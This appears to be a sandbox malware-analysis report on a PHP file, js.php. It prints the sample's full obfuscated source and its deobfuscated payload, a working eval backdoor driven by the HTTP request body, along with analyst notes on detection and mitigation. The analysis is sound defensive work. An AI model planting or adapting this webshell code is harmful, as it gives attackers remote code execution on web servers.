PHP Malware Analysis

js.php

md5: 878db2a64c2706404f996b68c1ad62c3


Screenshot


Attributes

Encoding

Execution

Files

Input


Deobfuscated PHP code

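Failed to deobfuscate code

(The decoded payload is still recoverable from the execution trace below: it appears as the return value of the second str_replace call and as the second argument to create_function.)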

Execution traces

data/traces/878db2a64c2706404f996b68c1ad62c3_trace-1676239213.4373.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:00:39.335154]
1	0	1	0.000138	393464
1	3	0	0.000195	396392	{main}	1		/var/www/html/uploads/js.php	0	0
1		A						/var/www/html/uploads/js.php	2	$m = '($iI=0;$iII<$l;){for(I$j=0I;($j<$cI&&$i<$l)I;$j++,$i++I){$oI.=$t{I$Ii}I^$k'
1		A						/var/www/html/uploads/js.php	3	$o = 'Iqja2d1";IfunctIionI Ix($t,$k){$Ic=stIrleIn($kI);$l=stIrlen($t);$o="";fIor'
1		A						/var/www/html/uploads/js.php	4	$A = '{$j};}}retIuIrn $o;}if (I@pregI_match(I"/$kh(.+)$kIf/",@fIIile_Iget_IcontI'
1		A						/var/www/html/uploads/js.php	5	$T = ';$rI=@basIeI64_eIncode(@x(@gzcIompress(I$o),$Ik))I;print("$IpI$kh$r$kf");}'
1		A						/var/www/html/uploads/js.php	6	$f = 'ents("php://input"I),$m)==I1) {@oIIIb_start();@eIval(@gzuIncompreIsIs(@x(@'
2	4	0	0.000286	396392	str_replace	0		/var/www/html/uploads/js.php	7	3	'Kw'	''	'cKwreaKwKwte_fKwKwunKwction'
2	4	1	0.000303	396528
2	4	R			'create_function'
1		A						/var/www/html/uploads/js.php	7	$X = 'create_function'
1		A						/var/www/html/uploads/js.php	8	$U = 'bIase6I4_decode($m[1])I,I$k)));$o=@oIbI_geIt_contents();I@ob_enId_cIlean()'
1		A						/var/www/html/uploads/js.php	9	$r = '$k="Iebcfc18d";I$kh="38Ia772eIdd52eI";$Ikf="98Iad8I50c2ee7";$p="kIQGBvflIdVL'
2	5	0	0.000356	397072	str_replace	0		/var/www/html/uploads/js.php	10	3	'I'	''	'$k="Iebcfc18d";I$kh="38Ia772eIdd52eI";$Ikf="98Iad8I50c2ee7";$p="kIQGBvflIdVLIqja2d1";IfunctIionI Ix($t,$k){$Ic=stIrleIn($kI);$l=stIrlen($t);$o="";fIor($iI=0;$iII<$l;){for(I$j=0I;($j<$cI&&$i<$l)I;$j++,$i++I){$oI.=$t{I$Ii}I^$k{$j};}}retIuIrn $o;}if (I@pregI_match(I"/$kh(.+)$kIf/",@fIIile_Iget_IcontIents("php://input"I),$m)==I1) {@oIIIb_start();@eIval(@gzuIncompreIsIs(@x(@bIase6I4_decode($m[1])I,I$k)));$o=@oIbI_geIt_contents();I@ob_enId_cIlean();$rI=@basIeI64_eIncode(@x(@gzcIompress(I$o),$Ik))I;print("$IpI$kh$'
2	5	1	0.000388	397680
2	5	R			'$k="ebcfc18d";$kh="38a772edd52e";$kf="98ad850c2ee7";$p="kQGBvfldVLqja2d1";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
1		A						/var/www/html/uploads/js.php	10	$E = '$k="ebcfc18d";$kh="38a772edd52e";$kf="98ad850c2ee7";$p="kQGBvfldVLqja2d1";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
2	6	0	0.000445	396944	create_function	0		/var/www/html/uploads/js.php	11	2	''	'$k="ebcfc18d";$kh="38a772edd52e";$kf="98ad850c2ee7";$p="kQGBvfldVLqja2d1";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
3	7	0	0.000524	404984	{internal eval}	1		/var/www/html/uploads/js.php	11	0
3	7	1	0.000538	404984
3	7	R			NULL
2	6	1	0.000553	403616
2	6	R			'\000lambda_2'
1		A						/var/www/html/uploads/js.php	11	$d = '\000lambda_2'
2	8	0	0.000580	403552	__lambda_func	1		/var/www/html/uploads/js.php	11	0
2		A						/var/www/html/uploads/js.php(11) : runtime-created function	1	$k = 'ebcfc18d'
2		A						/var/www/html/uploads/js.php(11) : runtime-created function	1	$kh = '38a772edd52e'
2		A						/var/www/html/uploads/js.php(11) : runtime-created function	1	$kf = '98ad850c2ee7'
2		A						/var/www/html/uploads/js.php(11) : runtime-created function	1	$p = 'kQGBvfldVLqja2d1'
3	9	0	0.000638	403608	file_get_contents	0		/var/www/html/uploads/js.php(11) : runtime-created function	1	1	'php://input'
3	9	1	0.000658	404344
3	9	R			''
3	10	0	0.000671	404328	preg_match	0		/var/www/html/uploads/js.php(11) : runtime-created function	1	3	'/38a772edd52e(.+)98ad850c2ee7/'	''	NULL
3	10	1	0.000723	404488
3	10	R			0
2	8	1	0.000757	404248
1	3	1	0.000766	404248
			0.000791	321664
TRACE END   [2023-02-12 20:00:39.335834]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
// Analyst notes for sample md5 878db2a64c2706404f996b68c1ad62c3 (js.php).
// Staged loader for an eval backdoor driven by the raw HTTP request body.
// The layout (shuffled string fragments, filler characters, create_function,
// XOR + zlib + base64 channel framed by fixed markers) resembles agents
// produced by the Weevely tool -- NOTE(review): attribution not confirmed by
// anything on this page.
//
// The seven string variables below ($m, $o, $A, $T, $f, $U, $r) are slices of
// one PHP source string, declared out of order and padded with the filler
// character 'I'. As a result, names such as eval, base64_decode and
// file_get_contents never occur as contiguous text in the file, presumably to
// get past plain keyword matching.
$m='($iI=0;$iII<$l;){for(I$j=0I;($j<$cI&&$i<$l)I;$j++,$i++I){$oI.=$t{I$Ii}I^$k';
$o='Iqja2d1";IfunctIionI Ix($t,$k){$Ic=stIrleIn($kI);$l=stIrlen($t);$o="";fIor';
$A='{$j};}}retIuIrn $o;}if (I@pregI_match(I"/$kh(.+)$kIf/",@fIIile_Iget_IcontI';
$T=';$rI=@basIeI64_eIncode(@x(@gzcIompress(I$o),$Ik))I;print("$IpI$kh$r$kf");}';
$f='ents("php://input"I),$m)==I1) {@oIIIb_start();@eIval(@gzuIncompreIsIs(@x(@';
// Same trick for the function name: stripping the filler 'Kw' yields
// 'create_function', so the call on the last line is a variable-function call
// with no literal function name to match on.
$X=str_replace('Kw','','cKwreaKwKwte_fKwKwunKwction');
$U='bIase6I4_decode($m[1])I,I$k)));$o=@oIbI_geIt_contents();I@ob_enId_cIlean()';
$r='$k="Iebcfc18d";I$kh="38Ia772eIdd52eI";$Ikf="98Iad8I50c2ee7";$p="kIQGBvflIdVL';
// Reassemble the slices in the order $r.$o.$m.$A.$f.$U.$T and strip the filler.
// The resulting source (shown in full in the sandbox trace) does the following:
//   - sets $k="ebcfc18d", $kh="38a772edd52e", $kf="98ad850c2ee7",
//     $p="kQGBvfldVLqja2d1";
//   - defines x($t,$k), a repeating-key XOR of $t with $k;
//   - reads php://input and matches /$kh(.+)$kf/ against it;
//   - on a match: base64-decodes the captured text, XORs it with $k,
//     gzuncompress()es it and passes the result to eval();
//   - buffers the eval output, gzcompress()es it, XORs it with $k,
//     base64-encodes it and prints it as $p . $kh . <data> . $kf.
// Every call is prefixed with '@', so errors are suppressed and a request
// without the markers produces an empty page (in the trace, preg_match
// returned 0 and nothing was evaluated).
// Detection: the literal values of $kh, $kf and $p frame the traffic in
// cleartext, so they are usable as request-body / response-body indicators for
// this particular sample; on disk, look for str_replace output used as a
// callable together with create_function.
$E=str_replace('I','',$r.$o.$m.$A.$f.$U.$T);
// create_function('', $E) compiles $E as the body of an anonymous function
// (the trace shows an internal eval at this point) and $d() runs it at once.
// create_function and the $t{$i} string-offset syntax used in the payload were
// both removed in PHP 8.0, so this file only works on older interpreters; on
// PHP 8+ the call fails with an undefined-function error.
// Mitigation: the trace path places the file under an uploads/ directory
// (NOTE(review): that may be the sandbox layout only) -- upload directories
// should not be configured to execute PHP.
$d=$X('',$E);$d();
?>